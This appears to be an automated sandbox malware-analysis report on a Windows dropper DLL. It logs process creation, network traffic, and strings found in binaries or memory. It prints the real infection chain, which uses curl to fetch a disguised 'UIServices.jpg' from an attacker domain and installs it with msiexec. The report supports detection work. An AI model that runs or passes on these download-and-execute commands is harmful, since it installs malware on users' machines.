        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://freegeoip.app/json/
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://freegeoip.app/json/X
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://github.com/serenity-rs/serenity
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://ipapi.co//json/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul
        Source: unknownDNS traffic detected: queries for: anydesk10.hospedagemdesites.ws
        Source: global trafficHTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
        Source: global trafficHTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
        Source: global trafficHTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: */*
        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC14D.tmpJump to behavior
        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3bbba0.msiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeCode function: 39_2_00007FFC235672A839_2_00007FFC235672A8
        Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exeCode function: 47_2_00007FFC23C672A847_2_00007FFC23C672A8
        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
        Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpenJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpenJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1Jump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79Jump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CDJump to behavior
        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\spclwow78x.msiJump to behavior
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary string: Failed to open \Device\Afd\Mio: HSF@
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary string: \Device\Afd\Mio
        Source: classification engineClassification label: mal52.troj.evad.winDLL@83/61@3/2
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345675608.00007FF79749A000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404351428.00007FF6FC45A000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.427347204.00007FF64349A000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:68:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
